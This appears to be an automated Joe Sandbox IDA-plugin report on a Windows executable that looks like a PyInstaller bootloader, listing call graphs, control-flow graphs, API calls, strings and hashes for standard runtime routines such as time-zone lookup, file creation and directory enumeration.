7ff61d33fd00 _fread_nolock MultiByteToWideChar 15933->15934 15935 7ff61d3497b2 15934->15935 15936 7ff61d349894 15935->15936 15937 7ff61d33fd00 _fread_nolock MultiByteToWideChar 15935->15937 15936->15932 15938 7ff61d33b00c __free_lconv_mon 11 API calls 15936->15938 15939 7ff61d3497d8 15937->15939 15938->15932 15939->15936 15940 7ff61d33dcbc _fread_nolock 12 API calls 15939->15940 15941 7ff61d349805 15939->15941 15940->15941 15941->15936 15942 7ff61d33fd00 _fread_nolock MultiByteToWideChar 15941->15942 15943 7ff61d34987c 15942->15943 15944 7ff61d34989c 15943->15944 15945 7ff61d349882 15943->15945 15952 7ff61d33f528 15944->15952 15945->15936 15948 7ff61d33b00c __free_lconv_mon 11 API calls 15945->15948 15948->15936 15949 7ff61d3498db 15949->15932 15951 7ff61d33b00c __free_lconv_mon 11 API calls 15949->15951 15950 7ff61d33b00c __free_lconv_mon 11 API calls 15950->15949 15951->15932 15953 7ff61d33f2d0 __crtLCMapStringW 5 API calls 15952->15953 15954 7ff61d33f566 15953->15954 15955 7ff61d33f56e 15954->15955 15956 7ff61d33f790 __crtLCMapStringW 5 API calls 15954->15956 15955->15949 15955->15950 15957 7ff61d33f5d7 CompareStringW 15956->15957 15957->15955 15959 7ff61d34862a HeapSize 15958->15959 15960 7ff61d348611 15958->15960 15961 7ff61d3355c4 _findclose 11 API calls 15960->15961 15962 7ff61d348616 15961->15962 15963 7ff61d33afa4 _invalid_parameter_noinfo 37 API calls 15962->15963 15964 7ff61d348621 15963->15964 15964->15419 15966 7ff61d340fdb 15965->15966 15967 7ff61d340fd1 15965->15967 15968 7ff61d340fe0 15966->15968 15975 7ff61d340fe7 _findclose 15966->15975 15969 7ff61d33dcbc _fread_nolock 12 API calls 15967->15969 15970 7ff61d33b00c __free_lconv_mon 11 API calls 15968->15970 15973 7ff61d340fd9 15969->15973 15970->15973 15971 7ff61d340fed 15974 7ff61d3355c4 _findclose 11 API calls 15971->15974 15972 7ff61d34101a HeapReAlloc 15972->15973 15972->15975 15973->15423 15974->15973 15975->15971 15975->15972 15976 7ff61d343d00 _findclose 2 API calls 15975->15976 15976->15975 15978 7ff61d33f2d0 __crtLCMapStringW 5 API calls 15977->15978 15979 7ff61d33f504 15978->15979 15979->15428 15981 7ff61d3356ae 15980->15981 15982 7ff61d3356d2 15980->15982 15986 7ff61d33b00c __free_lconv_mon 11 API calls 15981->15986 15988 7ff61d3356bd 15981->15988 15983 7ff61d3356d7 15982->15983 15984 7ff61d33572c 15982->15984 15983->15988 15989 7ff61d3356ec 15983->15989 15990 7ff61d33b00c __free_lconv_mon 11 API calls 15983->15990 15985 7ff61d33fd00 _fread_nolock MultiByteToWideChar 15984->15985 15987 7ff61d335748 15985->15987 15986->15988 15992 7ff61d33574f GetLastError 15987->15992 15994 7ff61d33577d 15987->15994 15997 7ff61d33b00c __free_lconv_mon 11 API calls 15987->15997 16001 7ff61d33578a 15987->16001 15988->15431 15988->15432 15991 7ff61d33dcbc _fread_nolock 12 API calls 15989->15991 15990->15989 15991->15988 16002 7ff61d335538 15992->16002 15998 7ff61d33dcbc _fread_nolock 12 API calls 15994->15998 15995 7ff61d33fd00 _fread_nolock MultiByteToWideChar 15999 7ff61d3357ce 15995->15999 15997->15994 15998->16001 15999->15988 15999->15992 16000 7ff61d3355c4 _findclose 11 API calls 16000->15988 16001->15988 16001->15995 16003 7ff61d33b988 _findclose 11 API calls 16002->16003 16004 7ff61d335545 __free_lconv_mon 16003->16004 16005 7ff61d33b988 _findclose 11 API calls 16004->16005 16006 7ff61d335567 16005->16006 16006->16000 18928 7ff61d32b340 18929 7ff61d32b36e 18928->18929 18930 7ff61d32b355 18928->18930 18930->18929 18932 7ff61d33dcbc 12 API calls 18930->18932 18931 7ff61d32b3cc 18932->18931 18806 7ff61d337f4c 18807 7ff61d337f7a 18806->18807 18808 7ff61d337fb3 18806->18808 18810 7ff61d3355c4 _findclose 11 API calls 18807->18810 18808->18807 18809 7ff61d337fb8 FindFirstFileExW 18808->18809 18811 7ff61d337fda GetLastError 18809->18811 18812 7ff61d338021 18809->18812 18813 7ff61d337f7f 18810->18813 18815 7ff61d338011 18811->18815 18816 7ff61d337fe5 18811->18816 18866 7ff61d3381bc 18812->18866 18817 7ff61d33afa4 _invalid_parameter_noinfo 37 API calls 18813->18817 18819 7ff61d3355c4 _findclose 11 API calls 18815->18819 18816->18815 18822 7ff61d338001 18816->18822 18823 7ff61d337fef 18816->18823 18818 7ff61d337f8a 18817->18818 18824 7ff61d32bdc0 _wfindfirst32i64 8 API calls 18818->18824 18819->18818 18821 7ff61d3381bc _wfindfirst32i64 10 API calls 18825 7ff61d338047 18821->18825 18827 7ff61d3355c4 _findclose 11 API calls 18822->18827 18823->18815 18826 7ff61d337ff4 18823->18826 18828 7ff61d337f9e 18824->18828 18829 7ff61d3381bc _wfindfirst32i64 10 API calls 18825->18829 18830 7ff61d3355c4 _findclose 11 API calls 18826->18830 18827->18818 18831 7ff61d338055 18829->18831 18830->18818 18832 7ff61d340f54 _wfindfirst32i64 37 API calls 18831->18832 18833 7ff61d338073 18832->18833 18833->18818 18834 7ff61d33807f 18833->18834 18835 7ff61d33afc4 _wfindfirst32i64 17 API calls 18834->18835 18836 7ff61d338093 18835->18836 18837 7ff61d3380bd 18836->18837 18840 7ff61d3380fc FindNextFileW 18836->18840 18838 7ff61d3355c4 _findclose 11 API calls 18837->18838 18839 7ff61d3380c2 18838->18839 18841 7ff61d33afa4 _invalid_parameter_noinfo 37 API calls 18839->18841 18842 7ff61d33814c 18840->18842 18843 7ff61d33810b GetLastError 18840->18843 18850 7ff61d3380cd 18841->18850 18844 7ff61d3381bc _wfindfirst32i64 10 API calls 18842->18844 18845 7ff61d33813f 18843->18845 18848 7ff61d338116 18843->18848 18847 7ff61d338164 18844->18847 18846 7ff61d3355c4 _findclose 11 API calls 18845->18846 18846->18850 18851 7ff61d3381bc _wfindfirst32i64 10 API calls 18847->18851 18848->18845 18852 7ff61d338120 18848->18852 18853 7ff61d338132 18848->18853 18849 7ff61d32bdc0 _wfindfirst32i64 8 API calls 18855 7ff61d3380e0 18849->18855 18850->18849 18856 7ff61d338172 18851->18856 18852->18845 18857 7ff61d338125 18852->18857 18854 7ff61d3355c4 _findclose 11 API calls 18853->18854 18854->18850 18859 7ff61d3381bc _wfindfirst32i64 10 API calls 18856->18859 18858 7ff61d3355c4 _findclose 11 API calls 18857->18858 18858->18850 18860 7ff61d338180 18859->18860 18861 7ff61d340f54 _wfindfirst32i64 37 API calls 18860->18861 18862 7ff61d33819e 18861->18862 18862->18850 18863 7ff61d3381a6 18862->18863 18864 7ff61d33afc4 _wfindfirst32i64 17 API calls 18863->18864 18865 7ff61d3381ba 18864->18865 18867 7ff61d3381da FileTimeToSystemTime 18866->18867 18868 7ff61d3381d4 18866->18868 18869 7ff61d3381e9 SystemTimeToTzSpecificLocalTime 18867->18869 18871 7ff61d3381ff 18867->18871 18868->18867 18868->18871 18869->18871 18870 7ff61d32bdc0 _wfindfirst32i64 8 API calls 18872 7ff61d338039 18870->18872 18871->18870 18872->18821 19792 7ff61d33a3e0 19795 7ff61d33a35c 19792->19795 19802 7ff61d340db8 EnterCriticalSection 19795->19802 19803 7ff61d33cbe0 19814 7ff61d340db8 EnterCriticalSection 19803->19814 18873 7ff61d33fdec 18874 7ff61d33ffde 18873->18874 18876 7ff61d33fe2e _isindst 18873->18876 18875 7ff61d3355c4 _findclose 11 API calls 18874->18875 18893 7ff61d33ffce 18875->18893 18876->18874 18879 7ff61d33feae _isindst 18876->18879 18877 7ff61d32bdc0 _wfindfirst32i64 8 API calls 18878 7ff61d33fff9 18877->18878 18894 7ff61d346a04 18879->18894 18884 7ff61d34000a 18886 7ff61d33afc4 _wfindfirst32i64 17 API calls 18884->18886 18888 7ff61d34001e 18886->18888 18891 7ff61d33ff0b 18891->18893 18919 7ff61d346a48 18891->18919 18893->18877 18895 7ff61d33fecc 18894->18895 18896 7ff61d346a13 18894->18896 18901 7ff61d345e08 18895->18901 18926 7ff61d340db8 EnterCriticalSection 18896->18926 18902 7ff61d33fee1 18901->18902 18903 7ff61d345e11 18901->18903 18902->18884 18907 7ff61d345e38 18902->18907 18904 7ff61d3355c4 _findclose 11 API calls 18903->18904 18905 7ff61d345e16 18904->18905 18906 7ff61d33afa4 _invalid_parameter_noinfo 37 API calls 18905->18906 18906->18902 18908 7ff61d33fef2 18907->18908 18909 7ff61d345e41 18907->18909 18908->18884 18913 7ff61d345e68 18908->18913 18910 7ff61d3355c4 _findclose 11 API calls 18909->18910 18911 7ff61d345e46 18910->18911 18912 7ff61d33afa4 _invalid_parameter_noinfo 37 API calls 18911->18912 18912->18908 18914 7ff61d345e71 18913->18914 18916 7ff61d33ff03 18913->18916 18915 7ff61d3355c4 _findclose 11 API calls 18914->18915 18917 7ff61d345e76 18915->18917 18916->18884 18916->18891 18918 7ff61d33afa4 _invalid_parameter_noinfo 37 API calls 18917->18918 18918->18916 18927 7ff61d340db8 EnterCriticalSection 18919->18927 18933 7ff61d339ff1 18934 7ff61d33aa68 45 API calls 18933->18934 18935 7ff61d339ff6 18934->18935 18936 7ff61d33a067 18935->18936 18937 7ff61d33a01d GetModuleHandleW 18935->18937 18945 7ff61d339ef4 18936->18945 18937->18936 18942 7ff61d33a02a 18937->18942 18942->18936 18959 7ff61d33a118 GetModuleHandleExW 18942->18959 18965 7ff61d340db8 EnterCriticalSection 18945->18965 18960 7ff61d33a14c GetProcAddress 18959->18960 18961 7ff61d33a175 18959->18961 18962 7ff61d33a15e 18960->18962 18963 7ff61d33a17a FreeLibrary 18961->18963 18964 7ff61d33a181 18961->18964 18962->18961 18963->18964 18964->18936 19895 7ff61d34abf4 19898 7ff61d335478 LeaveCriticalSection 19895->19898 19321 7ff61d34aa6e 19322 7ff61d34aa7e 19321->19322 19325 7ff61d335478 LeaveCriticalSection 19322->19325

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 111 7ff61d346470-7ff61d3464ab call 7ff61d345df8 call 7ff61d345e00 call 7ff61d345e68 118 7ff61d3464b1-7ff61d3464bc call 7ff61d345e08 111->118 119 7ff61d3466d5-7ff61d346721 call 7ff61d33afc4 call 7ff61d345df8 call 7ff61d345e00 call 7ff61d345e68 111->119 118->119 124 7ff61d3464c2-7ff61d3464cc 118->124 145 7ff61d346727-7ff61d346732 call 7ff61d345e08 119->145 146 7ff61d34685f-7ff61d3468cd call 7ff61d33afc4 call 7ff61d341ce8 119->146 126 7ff61d3464ee-7ff61d3464f2 124->126 127 7ff61d3464ce-7ff61d3464d1 124->127 131 7ff61d3464f5-7ff61d3464fd 126->131 129 7ff61d3464d4-7ff61d3464df 127->129 132 7ff61d3464ea-7ff61d3464ec 129->132 133 7ff61d3464e1-7ff61d3464e8 129->133 131->131 135 7ff61d3464ff-7ff61d346512 call 7ff61d33dcbc 131->135 132->126 137 7ff61d34651b-7ff61d346529 132->137 133->129 133->132 142 7ff61d34652a-7ff61d346536 call 7ff61d33b00c 135->142 143 7ff61d346514-7ff61d346516 call 7ff61d33b00c 135->143 152 7ff61d34653d-7ff61d346545 142->152 143->137 145->146 156 7ff61d346738-7ff61d346743 call 7ff61d345e38 145->156 164 7ff61d3468db-7ff61d3468de 146->164 165 7ff61d3468cf-7ff61d3468d6 146->165 152->152 155 7ff61d346547-7ff61d346558 call 7ff61d340f54 152->155 155->119 166 7ff61d34655e-7ff61d3465b4 call 7ff61d32d1e0 * 4 call 7ff61d34638c 155->166 156->146 163 7ff61d346749-7ff61d34676c call 7ff61d33b00c GetTimeZoneInformation 156->163 177 7ff61d346834-7ff61d34685e call 7ff61d345df0 call 7ff61d345de0 call 7ff61d345de8 163->177 178 7ff61d346772-7ff61d346793 163->178 170 7ff61d3468e0 164->170 171 7ff61d346915-7ff61d346928 call 7ff61d33dcbc 164->171 168 7ff61d34696b-7ff61d34696e 165->168 223 7ff61d3465b6-7ff61d3465ba 166->223 175 7ff61d346974-7ff61d34697c call 7ff61d346470 168->175 176 7ff61d3468e3 168->176 170->176 188 7ff61d34692a 171->188 189 7ff61d346933-7ff61d34694e call 7ff61d341ce8 171->189 182 7ff61d3468e8-7ff61d346914 call 7ff61d33b00c call 7ff61d32bdc0 175->182 176->182 183 7ff61d3468e3 call 7ff61d3466ec 176->183 184 7ff61d34679e-7ff61d3467a5 178->184 185 7ff61d346795-7ff61d34679b 178->185 183->182 192 7ff61d3467b9 184->192 193 7ff61d3467a7-7ff61d3467af 184->193 185->184 196 7ff61d34692c-7ff61d346931 call 7ff61d33b00c 188->196 210 7ff61d346950-7ff61d346953 189->210 211 7ff61d346955-7ff61d346967 call 7ff61d33b00c 189->211 205 7ff61d3467bb-7ff61d34682f call 7ff61d32d1e0 * 4 call 7ff61d3432cc call 7ff61d346984 * 2 192->205 193->192 199 7ff61d3467b1-7ff61d3467b7 193->199 196->170 199->205 205->177 210->196 211->168 225 7ff61d3465bc 223->225 226 7ff61d3465c0-7ff61d3465c4 223->226 225->226 226->223 229 7ff61d3465c6-7ff61d3465eb call 7ff61d33716c 226->229 235 7ff61d3465ee-7ff61d3465f2 229->235 237 7ff61d346601-7ff61d346605 235->237 238 7ff61d3465f4-7ff61d3465ff 235->238 237->235 238->237 240 7ff61d346607-7ff61d34660b 238->240 242 7ff61d34660d-7ff61d346635 call 7ff61d33716c 240->242 243 7ff61d34668c-7ff61d346690 240->243 250 7ff61d346637 242->250 251 7ff61d346653-7ff61d346657 242->251 244 7ff61d346697-7ff61d3466a4 243->244 245 7ff61d346692-7ff61d346694 243->245 247 7ff61d3466a6-7ff61d3466bc call 7ff61d34638c 244->247 248 7ff61d3466bf-7ff61d3466ce call 7ff61d345df0 call 7ff61d345de0 244->248 245->244 247->248 248->119 254 7ff61d34663a-7ff61d346641 250->254 251->243 256 7ff61d346659-7ff61d346677 call 7ff61d33716c 251->256 254->251 258 7ff61d346643-7ff61d346651 254->258 263 7ff61d346683-7ff61d34668a 256->263 258->251 258->254 263->243 264 7ff61d346679-7ff61d34667d 263->264 264->243 265 7ff61d34667f 264->265 265->263
                                                                                                                                          APIs
                                                                                                                                          • _get_daylight.LIBCMT ref: 00007FF61D3464B5
                                                                                                                                            • Part of subcall function 00007FF61D345E08: _invalid_parameter_noinfo.LIBCMT ref: 00007FF61D345E1C
                                                                                                                                            • Part of subcall function 00007FF61D33B00C: RtlRestoreThreadPreferredUILanguages.NTDLL(?,?,?,00007FF61D343492,?,?,?,00007FF61D3434CF,?,?,00000000,00007FF61D343995,?,?,00000000,00007FF61D3438C7), ref: 00007FF61D33B022
                                                                                                                                            • Part of subcall function 00007FF61D33B00C: GetLastError.KERNEL32(?,?,?,00007FF61D343492,?,?,?,00007FF61D3434CF,?,?,00000000,00007FF61D343995,?,?,00000000,00007FF61D3438C7), ref: 00007FF61D33B02C
                                                                                                                                            • Part of subcall function 00007FF61D33AFC4: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF61D33AFA3,?,?,?,?,?,00007FF61D3331CC), ref: 00007FF61D33AFCD
                                                                                                                                            • Part of subcall function 00007FF61D33AFC4: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF61D33AFA3,?,?,?,?,?,00007FF61D3331CC), ref: 00007FF61D33AFF2
                                                                                                                                          • _get_daylight.LIBCMT ref: 00007FF61D3464A4
                                                                                                                                            • Part of subcall function 00007FF61D345E68: _invalid_parameter_noinfo.LIBCMT ref: 00007FF61D345E7C
                                                                                                                                          • _get_daylight.LIBCMT ref: 00007FF61D34671A
                                                                                                                                          • _get_daylight.LIBCMT ref: 00007FF61D34672B
                                                                                                                                          • _get_daylight.LIBCMT ref: 00007FF61D34673C
                                                                                                                                          • GetTimeZoneInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,00007FF61D34697C), ref: 00007FF61D346763
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureInformationLanguagesLastPreferredPresentProcessProcessorRestoreThreadTimeZone
                                                                                                                                          • String ID: W. Europe Standard Time$W. Europe Summer Time
                                                                                                                                          • API String ID: 1458651798-690618308
                                                                                                                                          • Opcode ID: 0fbca74829f5eb391b29e48272e935aab84cd8bbcbc1d6e9a96b388f8462614d
                                                                                                                                          • Instruction ID: 0ae8826251984197e8b98de2a207ef29cbae9e53258315309de3d8feac909c7a
                                                                                                                                          • Opcode Fuzzy Hash: 0fbca74829f5eb391b29e48272e935aab84cd8bbcbc1d6e9a96b388f8462614d
                                                                                                                                          • Instruction Fuzzy Hash: A1D1D032E08A5286EB60DF25D8511F9A761EF46FA4F448135EA0DC7A86FF3EE441D780
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 444 7ff61d3473bc-7ff61d34742f call 7ff61d3470f0 447 7ff61d347449-7ff61d347453 call 7ff61d338534 444->447 448 7ff61d347431-7ff61d34743a call 7ff61d3355a4 444->448 453 7ff61d34746e-7ff61d3474d7 CreateFileW 447->453 454 7ff61d347455-7ff61d34746c call 7ff61d3355a4 call 7ff61d3355c4 447->454 455 7ff61d34743d-7ff61d347444 call 7ff61d3355c4 448->455 457 7ff61d3474d9-7ff61d3474df 453->457 458 7ff61d347554-7ff61d34755f GetFileType 453->458 454->455 466 7ff61d34778a-7ff61d3477aa 455->466 464 7ff61d347521-7ff61d34754f GetLastError call 7ff61d335538 457->464 465 7ff61d3474e1-7ff61d3474e5 457->465 461 7ff61d347561-7ff61d34759c GetLastError call 7ff61d335538 CloseHandle 458->461 462 7ff61d3475b2-7ff61d3475b9 458->462 461->455 478 7ff61d3475a2-7ff61d3475ad call 7ff61d3355c4 461->478 469 7ff61d3475bb-7ff61d3475bf 462->469 470 7ff61d3475c1-7ff61d3475c4 462->470 464->455 465->464 471 7ff61d3474e7-7ff61d34751f CreateFileW 465->471 475 7ff61d3475ca-7ff61d34761f call 7ff61d33844c 469->475 470->475 476 7ff61d3475c6 470->476 471->458 471->464 483 7ff61d347621-7ff61d34762d call 7ff61d3472f8 475->483 484 7ff61d34763e-7ff61d34766f call 7ff61d346e70 475->484 476->475 478->455 483->484 489 7ff61d34762f 483->489 490 7ff61d347671-7ff61d347673 484->490 491 7ff61d347675-7ff61d3476b7 484->491 492 7ff61d347631-7ff61d347639 call 7ff61d33b184 489->492 490->492 493 7ff61d3476d9-7ff61d3476e4 491->493 494 7ff61d3476b9-7ff61d3476bd 491->494 492->466 497 7ff61d347788 493->497 498 7ff61d3476ea-7ff61d3476ee 493->498 494->493 496 7ff61d3476bf-7ff61d3476d4 494->496 496->493 497->466 498->497 500 7ff61d3476f4-7ff61d347739 CloseHandle CreateFileW 498->500 501 7ff61d34773b-7ff61d347769 GetLastError call 7ff61d335538 call 7ff61d338674 500->501 502 7ff61d34776e-7ff61d347783 500->502 501->502 502->497
                                                                                                                                          APIs
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 1617910340-0
                                                                                                                                          • Opcode ID: 3a34930d5f91773cec3df5f99ae8c8b4927d9c8c66a9e1d3c980e3b08bacfc22
                                                                                                                                          • Instruction ID: 40812f836066564d89d2975425b3c659ffbe700e9f414b3c74c84329803225b7
                                                                                                                                          • Opcode Fuzzy Hash: 3a34930d5f91773cec3df5f99ae8c8b4927d9c8c66a9e1d3c980e3b08bacfc22
                                                                                                                                          • Instruction Fuzzy Hash: B5C1C272B24E4185EB11CF64C4902BC7761EB4AFA8B414235DA1E9B3D4EF3DE056C740
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Control-flow Graph

                                                                                                                                          APIs
                                                                                                                                          • GetTempPathW.KERNEL32(00000000,?,00000000,00000000,?,00007FF61D32154F), ref: 00007FF61D3279F7
                                                                                                                                            • Part of subcall function 00007FF61D327B70: GetEnvironmentVariableW.KERNEL32(00007FF61D323A1F), ref: 00007FF61D327BAA
                                                                                                                                            • Part of subcall function 00007FF61D327B70: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF61D327BC7
                                                                                                                                            • Part of subcall function 00007FF61D337EEC: _invalid_parameter_noinfo.LIBCMT ref: 00007FF61D337F05
                                                                                                                                          • SetEnvironmentVariableW.KERNEL32 ref: 00007FF61D327AB1
                                                                                                                                            • Part of subcall function 00007FF61D322B30: MessageBoxW.USER32 ref: 00007FF61D322C05
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Environment$Variable$ExpandMessagePathStringsTemp_invalid_parameter_noinfo
                                                                                                                                          • String ID: LOADER: Failed to set the TMP environment variable.$TMP$TMP$_MEI%d
                                                                                                                                          • API String ID: 3752271684-1116378104
                                                                                                                                          • Opcode ID: 4444cf2387327459b36d36c56f83932e68c7841fa26f52f393da3f83a2012f24
                                                                                                                                          • Instruction ID: b5df4a715581d1a0fdd087876b50a89eec096bc3e1e61811413efed966db4771
                                                                                                                                          • Opcode Fuzzy Hash: 4444cf2387327459b36d36c56f83932e68c7841fa26f52f393da3f83a2012f24
                                                                                                                                          • Instruction Fuzzy Hash: 3A51AE71F09E4251FE59E73669252BAD2416F8BFE4F444035ED0ECB79AFE6DE4018280
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 777 7ff61d3466ec-7ff61d346721 call 7ff61d345df8 call 7ff61d345e00 call 7ff61d345e68 784 7ff61d346727-7ff61d346732 call 7ff61d345e08 777->784 785 7ff61d34685f-7ff61d3468cd call 7ff61d33afc4 call 7ff61d341ce8 777->785 784->785 791 7ff61d346738-7ff61d346743 call 7ff61d345e38 784->791 797 7ff61d3468db-7ff61d3468de 785->797 798 7ff61d3468cf-7ff61d3468d6 785->798 791->785 796 7ff61d346749-7ff61d34676c call 7ff61d33b00c GetTimeZoneInformation 791->796 807 7ff61d346834-7ff61d34685e call 7ff61d345df0 call 7ff61d345de0 call 7ff61d345de8 796->807 808 7ff61d346772-7ff61d346793 796->808 801 7ff61d3468e0 797->801 802 7ff61d346915-7ff61d346928 call 7ff61d33dcbc 797->802 800 7ff61d34696b-7ff61d34696e 798->800 805 7ff61d346974-7ff61d34697c call 7ff61d346470 800->805 806 7ff61d3468e3 800->806 801->806 817 7ff61d34692a 802->817 818 7ff61d346933-7ff61d34694e call 7ff61d341ce8 802->818 811 7ff61d3468e8-7ff61d346914 call 7ff61d33b00c call 7ff61d32bdc0 805->811 806->811 812 7ff61d3468e3 call 7ff61d3466ec 806->812 813 7ff61d34679e-7ff61d3467a5 808->813 814 7ff61d346795-7ff61d34679b 808->814 812->811 820 7ff61d3467b9 813->820 821 7ff61d3467a7-7ff61d3467af 813->821 814->813 824 7ff61d34692c-7ff61d346931 call 7ff61d33b00c 817->824 836 7ff61d346950-7ff61d346953 818->836 837 7ff61d346955-7ff61d346967 call 7ff61d33b00c 818->837 831 7ff61d3467bb-7ff61d34682f call 7ff61d32d1e0 * 4 call 7ff61d3432cc call 7ff61d346984 * 2 820->831 821->820 826 7ff61d3467b1-7ff61d3467b7 821->826 824->801 826->831 831->807 836->824 837->800
                                                                                                                                          APIs
                                                                                                                                          • _get_daylight.LIBCMT ref: 00007FF61D34671A
                                                                                                                                            • Part of subcall function 00007FF61D345E68: _invalid_parameter_noinfo.LIBCMT ref: 00007FF61D345E7C
                                                                                                                                          • _get_daylight.LIBCMT ref: 00007FF61D34672B
                                                                                                                                            • Part of subcall function 00007FF61D345E08: _invalid_parameter_noinfo.LIBCMT ref: 00007FF61D345E1C
                                                                                                                                          • _get_daylight.LIBCMT ref: 00007FF61D34673C
                                                                                                                                            • Part of subcall function 00007FF61D345E38: _invalid_parameter_noinfo.LIBCMT ref: 00007FF61D345E4C
                                                                                                                                            • Part of subcall function 00007FF61D33B00C: RtlRestoreThreadPreferredUILanguages.NTDLL(?,?,?,00007FF61D343492,?,?,?,00007FF61D3434CF,?,?,00000000,00007FF61D343995,?,?,00000000,00007FF61D3438C7), ref: 00007FF61D33B022
                                                                                                                                            • Part of subcall function 00007FF61D33B00C: GetLastError.KERNEL32(?,?,?,00007FF61D343492,?,?,?,00007FF61D3434CF,?,?,00000000,00007FF61D343995,?,?,00000000,00007FF61D3438C7), ref: 00007FF61D33B02C
                                                                                                                                          • GetTimeZoneInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,00007FF61D34697C), ref: 00007FF61D346763
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: _get_daylight_invalid_parameter_noinfo$ErrorInformationLanguagesLastPreferredRestoreThreadTimeZone
                                                                                                                                          • String ID: W. Europe Standard Time$W. Europe Summer Time
                                                                                                                                          • API String ID: 2248164782-690618308
                                                                                                                                          • Opcode ID: 5b5d09b228255999272c5ce90a56ec2a5c1c9b61d05c7224e163f0b1bb3d1365
                                                                                                                                          • Instruction ID: 0f9a979667027e2ab5b58a9894064ccf5007dbea6677bc7652cb3ecdb767da8d
                                                                                                                                          • Opcode Fuzzy Hash: 5b5d09b228255999272c5ce90a56ec2a5c1c9b61d05c7224e163f0b1bb3d1365
                                                                                                                                          • Instruction Fuzzy Hash: 73517032E18A8286E750DF25E8915A9E760BF4AFA4F444135EA4DC3A96FF3DE540C780
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true
